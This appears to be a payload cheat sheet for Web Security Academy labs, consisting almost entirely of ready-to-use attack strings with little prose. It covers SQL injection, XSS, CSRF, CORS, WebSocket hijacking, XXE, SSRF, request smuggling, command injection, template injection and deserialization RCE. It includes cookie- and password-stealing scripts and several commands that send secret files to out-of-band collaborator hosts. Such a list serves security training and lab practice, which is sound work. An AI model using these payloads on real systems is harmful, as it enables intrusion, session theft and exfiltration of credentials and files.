Payloads

SQLi

UNION SQLi

#clause bypass
'+OR+1=1--

#login bypass
administrator'--

#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--

#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#

#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--

#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--

#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

Blind SQLi

#Conditional response
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2

#Table exist
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a

#User exist
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a

#Password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a

#Password guess
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

Blind error based SQLi

TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

Visible Error

TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

Blind Time-based

TrackingId=x'||pg_sleep(10)--
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))

TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

Out of Band Interactions

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

SQLI inside XML

<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

XSS

DOM-based XSS

#document.write sink
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>

#document.write sink
"><svg onload=alert(1)>

#innerHTML sink
<img src=1 onerror=alert(1)>

#jQuery href sink
javascript:alert(document.cookie)

#jQuery selector sink
<iframe src="https://lab.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

#angular ng-app
{{$on.constructor('alert(1)')()}}

1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

#json sink
\"-alert(1)}//

#bypass angle brackets replace
<><img src=1 onerror=alert(1)>

#open redirection
https://lab.web-security-academy.net/post?postId=4&url=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/


#cookie manipulation
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">



#WAF bypass
"-alert(window["document"]["cookie"])-"
"-window["alert"](window["document"]["cookie"])-"
"-self["alert"](self["document"]["cookie"])-" 

• Using the eval() method evaluates or executes an argument.

• Using atob() or btoa() is function used for encoding to and from base64 format strings.

• If eval() being blocked then Alternatives:

  • setTimeout("code")

  • setInterval("code)

  • setImmediate("code")

  • Function("code")()

XSS web messages

<iframe src="https://lab.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

#JSON.parse() sink of web msg
<iframe src=https://YOUR-LAB-ID.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

Reflected

#js string with angle brackets
'-alert(1)-'
blez';alert(1);let myvar='test

#tag attribute with angle brackets <>
test" onmouseover="alert(1)

#blocked tags and attrs
<iframe src="https://lab.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

#custom tags
<script>
location = 'https://lab.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

#svg tag allowed
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

#single quote and backslash escape
</script><script>alert(1)</script>

#js with angle brackets, double quotes and single quotes escaped
\'-alert(1)//

#all quotes backslash but backticks js literal
${alert(1)}


\'-alert(1)//  

fuzzer\';console.log(12345);//  

fuzzer\';alert(`Testing The backtick a typographical mark used mainly in computing`);//

Stored

#href with double quotes
javascript:alert(1)

http://foo?'-alert(1)-'

#replacing angle brackets bypass
<><img src=1 onerror=alert(1)>

XSS stealers

#cookie stealer
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

#password stealer
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

XSS to CSRF

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

CSRF

<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<script>
        document.forms[0].submit();
</script>




#Method changed to GET
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<script>
        document.forms[0].submit();
</script>



#token tied to non-session cookie
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="blez@b.b">
</form>
<script>
        <img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
</script>




#token duplicated in cookie
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>




#SameSite Lax Bypass by method override
<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
</script>




#SameSite Strict Bypass via redirect
<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>



#SameSite Lax bypass by cookie refresh
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="pwned@portswigger.net">
</form>
<p>Click anywhere on the page</p>
<script>
    window.onclick = () => {
        window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
        setTimeout(changeEmail, 5000);
    }

    function changeEmail() {
        document.forms[0].submit();
    }
</script>


#bypass refere validation with header on exploit server
<meta name="referrer" content="no-referrer">



#Bypass refere validation broken
Referrer-Policy: unsafe-url
history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")

CSWSH - Cross-Site WebSocket Hijacking

#script to start a websocket chat
<script>
    var ws = new WebSocket('wss://YOUR-LAB-ID.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://YOUR-COLLABORATOR-PAYLOAD.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

<script>
    document.location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=YOUR-URL-ENCODED-CSWSH-SCRIPT&password=anything";
</script>

CORS

#Access-Control-Allow-Credentials reflect Origin
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>


#cors with null origin, use of an iframe sandbox as this generates a null origin request
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>


#reflected subdomain with XSS in productID
<script>
    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

XXE

#get file with external entities
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productID>&xxe;</productID>

#ssrf atack to public adress
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<productID>&xxe;</productID>

Blind XXE

#out of band blind xxe
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
<productID>&xxe;</productID>

#out of band parameter entities
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

External DTD XXE

#malicious DTD out of band exfiltration
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>


#Error based
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

XInclude injection

<productID>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
</productID>

XXE image upload

#create local svg with whit content
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

SSRF

#try to change api to localhost
http://localhost/admin

#try call api on ip
http://192.168.0.1:6566/admin

http://127.0.0.1/admin

http://127.1/admin

#obfuscation of 'a'
http://127.1/%2561dmin

#open redirection ssrf
/product/nextProduct?path=http://192.168.0.12:6566/admin

Request Smuggling

CL.TE

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

-------------------------------------------------------------------------------------

#Bypass front-end control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=


-------------------------------------------------------------------------------------
#The front-end server adds an HTTP header to incoming requests containing their IP address
#host rewriting
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
X-abcdef-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1



-------------------------------------------------------------------------------------


#Steal user cookie
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=your-session-token

csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test



-------------------------------------------------------------------------------------
#smuggling request with xss inside the header
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>document.location='http://OASTIFY.COM/?cookiestealer='+document.cookie;</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

x=1

TE.CL

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

-------------------------------------------------------------------------------------

#Bypass frontend control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

H2.CL

1. Send the request a few times and confirm that you receive a redirect to the exploit server.

2. Resend the request and wait for 10 seconds or so.

3. Go to the exploit server and check the access log. If you see a GET /resources/ request from the victim, this indicates that your request smuggling attack was successful

POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0


GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5

x=1

H2.TE

Send the request to poison the response queue. You will receive the 404 response to your own request.

Wait for around 5 seconds, then send the request again to fetch an arbitrary response.

Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.

Copy the session cookie and use it to send the following request:

GET /admin HTTP/2

Host: YOUR-LAB-ID.web-security-academy.net

Cookie: session=STOLEN-SESSION-COOKIE

POST /x HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Transfer-Encoding: chunked

0

GET /x HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net

H2 CRLF Injeciton

Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.

0

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800

search=nutty

H2.TE desync v10a h2path

POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked

0

GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n

CL.0

1. Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).

POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT

GET /admin HTTP/1.1
Foo: x

OS cmd injection

storeID=1|whoami

email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

email=||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

#path traversal allowed
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

SSTI

#those will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,

}}{{7*7}} 
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}


#ERB
<%= system("cat+/home/carlos/secret") %>
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("cat+/home/carlos/secret")+%25>



#Tornado
POST /my-account/change-blog-post-author-display HTTP/2
Host: TARGET.net
Cookie: session=fenXl1hfjQBgGkrcmJoK7D8RU3eHkkCd

blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')




#Freemaker
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }



#Handlebars, url encoded as url param
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}

Path Traversal

/home/carlos/secret
....//....//....//....//home//carlos//secret
..%252f..%252f..%252fhome/carlos/secret
/var/www/images/../../../home/carlos/secret
../../../home/carlos/secret%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhome%252fcarlos%252fsecret


/etc/passwd
....//....//....//....//etc//passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Authentication

Authentication lab usernames | Web Security AcademyWebSecAcademy

Authentication lab passwords | Web Security AcademyWebSecAcademy

Web Sockets

<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

oAuth

#open redirection oauth steal token

<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

Deserialization

 #JAVA
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections3 'wget http:// --post-file=/home/carlos/secret' | base64 -w 0 
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections4 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0 




#PHP
#path to find a secret
/cgi-bin/phpinfo.php

#command creation
/opt/phpggc/phpggc Symfony/RCE4 exec 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0

#payload creation
<?php
$object = "";
$secretKey = "q9ekwze228qxcdd9uvfjxxkfsipzq9ul";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;




#RUBY script - 
# Autoload the required classes
Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)

JWT

https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

#crack JWT secret
hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list

Prototype pollution

#bypass sanitization
/?__pro__proto__to__[foo]=bar
/?__pro__proto__to__.foo=bar
/?constconstructorructor[protoprototypetype][foo]=bar
/?constconstructorructor.protoprototypetype.foo=bar


<script>
    location="https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29"
</script>


"__proto__": {
    "isAdmin":true
}


#server side prototype pollution
"constructor": {
    "prototype": {
        "isAdmin":true
    }
}


"__proto__": {
    "execArgv":[
        "--eval=require('child_process').execSync('cat /home/carlos/secret')"
    ]
}